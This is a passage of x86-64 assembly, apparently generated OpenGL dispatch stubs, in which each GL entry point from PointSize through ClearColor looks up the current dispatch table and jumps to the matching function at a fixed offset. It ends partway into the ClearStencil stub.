.p2align 4,,15
.globl GL_PREFIX(PointSize)
.type GL_PREFIX(PointSize), @function
GL_PREFIX(PointSize):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1384(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $8, %rsp
movq %xmm0, (%rsp)
call _x86_64_get_dispatch@PLT
movq (%rsp), %xmm0
addq $8, %rsp
movq 1384(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1384(%rax), %r11
jmp *%r11
1:
subq $8, %rsp
movq %xmm0, (%rsp)
call _glapi_get_dispatch
movq (%rsp), %xmm0
addq $8, %rsp
movq 1384(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(PointSize), .-GL_PREFIX(PointSize)
.p2align 4,,15
.globl GL_PREFIX(PolygonMode)
.type GL_PREFIX(PolygonMode), @function
GL_PREFIX(PolygonMode):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1392(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 1392(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1392(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 1392(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(PolygonMode), .-GL_PREFIX(PolygonMode)
.p2align 4,,15
.globl GL_PREFIX(PolygonStipple)
.type GL_PREFIX(PolygonStipple), @function
GL_PREFIX(PolygonStipple):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1400(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 1400(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1400(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 1400(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(PolygonStipple), .-GL_PREFIX(PolygonStipple)
.p2align 4,,15
.globl GL_PREFIX(Scissor)
.type GL_PREFIX(Scissor), @function
GL_PREFIX(Scissor):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1408(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 1408(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1408(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 1408(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Scissor), .-GL_PREFIX(Scissor)
.p2align 4,,15
.globl GL_PREFIX(ShadeModel)
.type GL_PREFIX(ShadeModel), @function
GL_PREFIX(ShadeModel):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1416(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 1416(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1416(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 1416(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(ShadeModel), .-GL_PREFIX(ShadeModel)
.p2align 4,,15
.globl GL_PREFIX(TexParameterf)
.type GL_PREFIX(TexParameterf), @function
GL_PREFIX(TexParameterf):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1424(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp
movq %rdi, (%rsp)
movq %rsi, 8(%rsp)
movq %xmm0, 16(%rsp)
call _x86_64_get_dispatch@PLT
movq 16(%rsp), %xmm0
movq 8(%rsp), %rsi
movq (%rsp), %rdi
addq $24, %rsp
movq 1424(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1424(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %rdi, (%rsp)
movq %rsi, 8(%rsp)
movq %xmm0, 16(%rsp)
call _glapi_get_dispatch
movq 16(%rsp), %xmm0
movq 8(%rsp), %rsi
movq (%rsp), %rdi
addq $24, %rsp
movq 1424(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(TexParameterf), .-GL_PREFIX(TexParameterf)
.p2align 4,,15
.globl GL_PREFIX(TexParameterfv)
.type GL_PREFIX(TexParameterfv), @function
GL_PREFIX(TexParameterfv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1432(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 1432(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1432(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 1432(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(TexParameterfv), .-GL_PREFIX(TexParameterfv)
.p2align 4,,15
.globl GL_PREFIX(TexParameteri)
.type GL_PREFIX(TexParameteri), @function
GL_PREFIX(TexParameteri):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1440(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 1440(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1440(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 1440(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(TexParameteri), .-GL_PREFIX(TexParameteri)
.p2align 4,,15
.globl GL_PREFIX(TexParameteriv)
.type GL_PREFIX(TexParameteriv), @function
GL_PREFIX(TexParameteriv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1448(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 1448(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1448(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 1448(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(TexParameteriv), .-GL_PREFIX(TexParameteriv)
.p2align 4,,15
.globl GL_PREFIX(TexImage1D)
.type GL_PREFIX(TexImage1D), @function
GL_PREFIX(TexImage1D):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1456(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 1456(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1456(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 1456(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(TexImage1D), .-GL_PREFIX(TexImage1D)
.p2align 4,,15
.globl GL_PREFIX(TexImage2D)
.type GL_PREFIX(TexImage2D), @function
GL_PREFIX(TexImage2D):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1464(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 1464(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1464(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 1464(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(TexImage2D), .-GL_PREFIX(TexImage2D)
.p2align 4,,15
.globl GL_PREFIX(TexEnvf)
.type GL_PREFIX(TexEnvf), @function
GL_PREFIX(TexEnvf):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1472(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp
movq %rdi, (%rsp)
movq %rsi, 8(%rsp)
movq %xmm0, 16(%rsp)
call _x86_64_get_dispatch@PLT
movq 16(%rsp), %xmm0
movq 8(%rsp), %rsi
movq (%rsp), %rdi
addq $24, %rsp
movq 1472(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1472(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %rdi, (%rsp)
movq %rsi, 8(%rsp)
movq %xmm0, 16(%rsp)
call _glapi_get_dispatch
movq 16(%rsp), %xmm0
movq 8(%rsp), %rsi
movq (%rsp), %rdi
addq $24, %rsp
movq 1472(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(TexEnvf), .-GL_PREFIX(TexEnvf)
.p2align 4,,15
.globl GL_PREFIX(TexEnvfv)
.type GL_PREFIX(TexEnvfv), @function
GL_PREFIX(TexEnvfv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1480(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 1480(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1480(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 1480(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(TexEnvfv), .-GL_PREFIX(TexEnvfv)
.p2align 4,,15
.globl GL_PREFIX(TexEnvi)
.type GL_PREFIX(TexEnvi), @function
GL_PREFIX(TexEnvi):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1488(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 1488(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1488(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 1488(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(TexEnvi), .-GL_PREFIX(TexEnvi)
.p2align 4,,15
.globl GL_PREFIX(TexEnviv)
.type GL_PREFIX(TexEnviv), @function
GL_PREFIX(TexEnviv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1496(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 1496(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1496(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 1496(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(TexEnviv), .-GL_PREFIX(TexEnviv)
.p2align 4,,15
.globl GL_PREFIX(TexGend)
.type GL_PREFIX(TexGend), @function
GL_PREFIX(TexGend):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1504(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp
movq %rdi, (%rsp)
movq %rsi, 8(%rsp)
movq %xmm0, 16(%rsp)
call _x86_64_get_dispatch@PLT
movq 16(%rsp), %xmm0
movq 8(%rsp), %rsi
movq (%rsp), %rdi
addq $24, %rsp
movq 1504(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1504(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %rdi, (%rsp)
movq %rsi, 8(%rsp)
movq %xmm0, 16(%rsp)
call _glapi_get_dispatch
movq 16(%rsp), %xmm0
movq 8(%rsp), %rsi
movq (%rsp), %rdi
addq $24, %rsp
movq 1504(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(TexGend), .-GL_PREFIX(TexGend)
.p2align 4,,15
.globl GL_PREFIX(TexGendv)
.type GL_PREFIX(TexGendv), @function
GL_PREFIX(TexGendv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1512(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 1512(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1512(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 1512(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(TexGendv), .-GL_PREFIX(TexGendv)
.p2align 4,,15
.globl GL_PREFIX(TexGenf)
.type GL_PREFIX(TexGenf), @function
GL_PREFIX(TexGenf):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1520(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp
movq %rdi, (%rsp)
movq %rsi, 8(%rsp)
movq %xmm0, 16(%rsp)
call _x86_64_get_dispatch@PLT
movq 16(%rsp), %xmm0
movq 8(%rsp), %rsi
movq (%rsp), %rdi
addq $24, %rsp
movq 1520(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1520(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %rdi, (%rsp)
movq %rsi, 8(%rsp)
movq %xmm0, 16(%rsp)
call _glapi_get_dispatch
movq 16(%rsp), %xmm0
movq 8(%rsp), %rsi
movq (%rsp), %rdi
addq $24, %rsp
movq 1520(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(TexGenf), .-GL_PREFIX(TexGenf)
.p2align 4,,15
.globl GL_PREFIX(TexGenfv)
.type GL_PREFIX(TexGenfv), @function
GL_PREFIX(TexGenfv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1528(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 1528(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1528(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 1528(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(TexGenfv), .-GL_PREFIX(TexGenfv)
.p2align 4,,15
.globl GL_PREFIX(TexGeni)
.type GL_PREFIX(TexGeni), @function
GL_PREFIX(TexGeni):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1536(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 1536(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1536(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 1536(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(TexGeni), .-GL_PREFIX(TexGeni)
.p2align 4,,15
.globl GL_PREFIX(TexGeniv)
.type GL_PREFIX(TexGeniv), @function
GL_PREFIX(TexGeniv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1544(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 1544(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1544(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 1544(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(TexGeniv), .-GL_PREFIX(TexGeniv)
.p2align 4,,15
.globl GL_PREFIX(FeedbackBuffer)
.type GL_PREFIX(FeedbackBuffer), @function
GL_PREFIX(FeedbackBuffer):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1552(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 1552(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1552(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 1552(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(FeedbackBuffer), .-GL_PREFIX(FeedbackBuffer)
.p2align 4,,15
.globl GL_PREFIX(SelectBuffer)
.type GL_PREFIX(SelectBuffer), @function
GL_PREFIX(SelectBuffer):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1560(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 1560(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1560(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 1560(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(SelectBuffer), .-GL_PREFIX(SelectBuffer)
.p2align 4,,15
.globl GL_PREFIX(RenderMode)
.type GL_PREFIX(RenderMode), @function
GL_PREFIX(RenderMode):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1568(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 1568(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1568(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 1568(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(RenderMode), .-GL_PREFIX(RenderMode)
.p2align 4,,15
.globl GL_PREFIX(InitNames)
.type GL_PREFIX(InitNames), @function
GL_PREFIX(InitNames):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1576(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
movq 1576(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1576(%rax), %r11
jmp *%r11
1:
pushq %rbp
call _glapi_get_dispatch
popq %rbp
movq 1576(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(InitNames), .-GL_PREFIX(InitNames)
.p2align 4,,15
.globl GL_PREFIX(LoadName)
.type GL_PREFIX(LoadName), @function
GL_PREFIX(LoadName):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1584(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 1584(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1584(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 1584(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(LoadName), .-GL_PREFIX(LoadName)
.p2align 4,,15
.globl GL_PREFIX(PassThrough)
.type GL_PREFIX(PassThrough), @function
GL_PREFIX(PassThrough):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1592(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $8, %rsp
movq %xmm0, (%rsp)
call _x86_64_get_dispatch@PLT
movq (%rsp), %xmm0
addq $8, %rsp
movq 1592(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1592(%rax), %r11
jmp *%r11
1:
subq $8, %rsp
movq %xmm0, (%rsp)
call _glapi_get_dispatch
movq (%rsp), %xmm0
addq $8, %rsp
movq 1592(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(PassThrough), .-GL_PREFIX(PassThrough)
.p2align 4,,15
.globl GL_PREFIX(PopName)
.type GL_PREFIX(PopName), @function
GL_PREFIX(PopName):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1600(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
movq 1600(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1600(%rax), %r11
jmp *%r11
1:
pushq %rbp
call _glapi_get_dispatch
popq %rbp
movq 1600(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(PopName), .-GL_PREFIX(PopName)
.p2align 4,,15
.globl GL_PREFIX(PushName)
.type GL_PREFIX(PushName), @function
GL_PREFIX(PushName):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1608(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 1608(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1608(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 1608(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(PushName), .-GL_PREFIX(PushName)
.p2align 4,,15
.globl GL_PREFIX(DrawBuffer)
.type GL_PREFIX(DrawBuffer), @function
GL_PREFIX(DrawBuffer):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1616(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 1616(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1616(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 1616(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(DrawBuffer), .-GL_PREFIX(DrawBuffer)
.p2align 4,,15
.globl GL_PREFIX(Clear)
.type GL_PREFIX(Clear), @function
GL_PREFIX(Clear):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1624(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 1624(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1624(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 1624(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Clear), .-GL_PREFIX(Clear)
.p2align 4,,15
.globl GL_PREFIX(ClearAccum)
.type GL_PREFIX(ClearAccum), @function
GL_PREFIX(ClearAccum):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1632(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $40, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
movq %xmm3, 24(%rsp)
call _x86_64_get_dispatch@PLT
movq 24(%rsp), %xmm3
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $40, %rsp
movq 1632(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1632(%rax), %r11
jmp *%r11
1:
subq $40, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
movq %xmm3, 24(%rsp)
call _glapi_get_dispatch
movq 24(%rsp), %xmm3
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $40, %rsp
movq 1632(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(ClearAccum), .-GL_PREFIX(ClearAccum)
.p2align 4,,15
.globl GL_PREFIX(ClearIndex)
.type GL_PREFIX(ClearIndex), @function
GL_PREFIX(ClearIndex):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1640(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $8, %rsp
movq %xmm0, (%rsp)
call _x86_64_get_dispatch@PLT
movq (%rsp), %xmm0
addq $8, %rsp
movq 1640(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1640(%rax), %r11
jmp *%r11
1:
subq $8, %rsp
movq %xmm0, (%rsp)
call _glapi_get_dispatch
movq (%rsp), %xmm0
addq $8, %rsp
movq 1640(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(ClearIndex), .-GL_PREFIX(ClearIndex)
.p2align 4,,15
.globl GL_PREFIX(ClearColor)
.type GL_PREFIX(ClearColor), @function
GL_PREFIX(ClearColor):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1648(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 1648(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1648(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 1648(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(ClearColor), .-GL_PREFIX(ClearColor)
.p2align 4,,15
.globl GL_PREFIX(ClearStencil)
